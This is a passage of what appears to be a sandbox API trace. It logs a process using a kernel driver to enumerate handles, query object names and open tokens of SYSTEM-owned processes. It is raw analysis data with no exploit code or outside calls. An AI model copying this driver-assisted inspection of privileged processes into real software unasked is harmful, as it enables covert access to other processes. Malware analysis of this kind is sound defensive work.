ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.924] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003acf280, HandleInformation=0x0) returned 0x0 [0222.924] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.924] PsReleaseProcessExitSynchronization () returned 0x2 [0222.924] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.924] ObQueryNameString (in: Object=0xfffffa8003acf280, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.924] ObfDereferenceObject (Object=0xfffffa8003acf280) returned 0x2 [0222.924] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.924] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.924] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.924] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.925] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.925] PsAcquireProcessExitSynchronization () returned 0x0 [0222.925] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.925] ObReferenceObjectByHandle (in: Handle=0x74c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003acfda0, HandleInformation=0x0) returned 0x0 [0222.925] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.925] PsReleaseProcessExitSynchronization () returned 0x2 [0222.925] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.925] ObQueryNameString (in: Object=0xfffffa8003acfda0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.925] ObfDereferenceObject (Object=0xfffffa8003acfda0) returned 0x2 [0222.925] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.925] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.925] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.925] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.925] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.925] PsAcquireProcessExitSynchronization () returned 0x0 [0222.925] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.925] ObReferenceObjectByHandle (in: Handle=0x750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003acfb40, HandleInformation=0x0) returned 0x0 [0222.925] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.925] PsReleaseProcessExitSynchronization () returned 0x2 [0222.925] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.925] ObQueryNameString (in: Object=0xfffffa8003acfb40, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.925] ObfDereferenceObject (Object=0xfffffa8003acfb40) returned 0x2 [0222.925] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.925] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.926] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.926] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0222.926] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.926] PsAcquireProcessExitSynchronization () returned 0x0 [0222.926] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.926] ObReferenceObjectByHandle (in: Handle=0x870, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fd5d10, HandleInformation=0x0) returned 0x0 [0222.926] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.926] PsReleaseProcessExitSynchronization () returned 0x2 [0222.926] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.926] ObQueryNameString (in: Object=0xfffffa8001fd5d10, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.926] ObfDereferenceObject (Object=0xfffffa8001fd5d10) returned 0x2 [0222.926] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.926] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc8 [0222.926] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0222.926] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003654700, HandleInformation=0x0) returned 0x0 [0222.926] ObOpenObjectByPointer (in: Object=0xfffffa8003654700, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0222.926] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x41 [0222.926] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa800214e680 | out: TokenHandle=0xfffffa800214e680*=0xc4) returned 0x0 [0222.926] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0222.927] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.927] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0222.927] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0222.929] CloseHandle (hObject=0xc4) returned 1 [0222.929] CloseHandle (hObject=0xc8) returned 1 [0222.929] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.929] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0222.929] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.929] PsAcquireProcessExitSynchronization () returned 0x0 [0222.929] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.929] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036897a0, HandleInformation=0x0) returned 0x0 [0222.929] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.929] PsReleaseProcessExitSynchronization () returned 0x2 [0222.930] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.930] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.930] ObfDereferenceObject (Object=0xfffffa80036897a0) returned 0x1 [0222.930] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.930] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.930] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.930] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.930] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.930] PsAcquireProcessExitSynchronization () returned 0x0 [0222.930] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.930] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036ff9e0, HandleInformation=0x0) returned 0x0 [0222.930] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.930] PsReleaseProcessExitSynchronization () returned 0x2 [0222.930] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.930] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.930] ObfDereferenceObject (Object=0xfffffa80036ff9e0) returned 0x1 [0222.930] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.930] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.930] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.930] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.931] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.931] PsAcquireProcessExitSynchronization () returned 0x0 [0222.931] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.931] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003778bc0, HandleInformation=0x0) returned 0x0 [0222.931] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.931] PsReleaseProcessExitSynchronization () returned 0x2 [0222.931] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.931] ObQueryNameString (in: Object=0xfffffa8003778bc0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.931] ObfDereferenceObject (Object=0xfffffa8003778bc0) returned 0x1 [0222.931] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.931] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.931] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0222.931] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.931] PsAcquireProcessExitSynchronization () returned 0x0 [0222.931] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.931] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003781f20, HandleInformation=0x0) returned 0x0 [0222.931] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.931] PsReleaseProcessExitSynchronization () returned 0x2 [0222.931] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.931] ObQueryNameString (in: Object=0xfffffa8003781f20, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.932] ObfDereferenceObject (Object=0xfffffa8003781f20) returned 0x2 [0222.932] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.932] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.932] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.932] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0222.932] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.932] PsAcquireProcessExitSynchronization () returned 0x0 [0222.932] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.932] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003780a70, HandleInformation=0x0) returned 0x0 [0222.932] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.932] PsReleaseProcessExitSynchronization () returned 0x2 [0222.932] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.932] ObQueryNameString (in: Object=0xfffffa8003780a70, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.932] ObfDereferenceObject (Object=0xfffffa8003780a70) returned 0x1 [0222.932] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.932] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.933] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.933] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0222.933] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.933] PsAcquireProcessExitSynchronization () returned 0x0 [0222.933] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.933] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003781dd0, HandleInformation=0x0) returned 0x0 [0222.933] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.933] PsReleaseProcessExitSynchronization () returned 0x2 [0222.933] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.933] ObQueryNameString (in: Object=0xfffffa8003781dd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.933] ObfDereferenceObject (Object=0xfffffa8003781dd0) returned 0x1 [0222.933] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.933] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.933] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.933] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0222.933] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.933] PsAcquireProcessExitSynchronization () returned 0x0 [0222.933] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0222.934] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036c0070, HandleInformation=0x0) returned 0x0 [0222.934] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.934] PsReleaseProcessExitSynchronization () returned 0x2 [0222.934] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0222.934] ObQueryNameString (in: Object=0xfffffa80036c0070, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.934] ObfDereferenceObject (Object=0xfffffa80036c0070) returned 0x11 [0222.934] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.934] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x250) returned 0xc8 [0222.934] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0222.934] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80036f9b30, HandleInformation=0x0) returned 0x0 [0222.934] ObOpenObjectByPointer (in: Object=0xfffffa80036f9b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0222.935] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7e [0222.935] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa800214e680 | out: TokenHandle=0xfffffa800214e680*=0xc4) returned 0x0 [0222.935] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0222.935] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.935] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0222.935] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0222.938] CloseHandle (hObject=0xc4) returned 1 [0222.938] CloseHandle (hObject=0xc8) returned 1 [0222.938] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0222.938] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.938] PsAcquireProcessExitSynchronization () returned 0x0 [0222.938] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.938] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036f6e00, HandleInformation=0x0) returned 0x0 [0222.938] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.938] PsReleaseProcessExitSynchronization () returned 0x2 [0222.938] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.939] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.939] ObfDereferenceObject (Object=0xfffffa80036f6e00) returned 0x1 [0222.939] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.939] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.939] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.939] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.939] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.939] PsAcquireProcessExitSynchronization () returned 0x0 [0222.939] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.939] ObReferenceObjectByHandle (in: Handle=0x6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003719c10, HandleInformation=0x0) returned 0x0 [0222.939] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.939] PsReleaseProcessExitSynchronization () returned 0x2 [0222.939] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.939] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.940] ObfDereferenceObject (Object=0xfffffa8003719c10) returned 0x1 [0222.940] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.940] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.940] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.940] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0222.940] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.940] PsAcquireProcessExitSynchronization () returned 0x0 [0222.940] KeStackAttachProcess 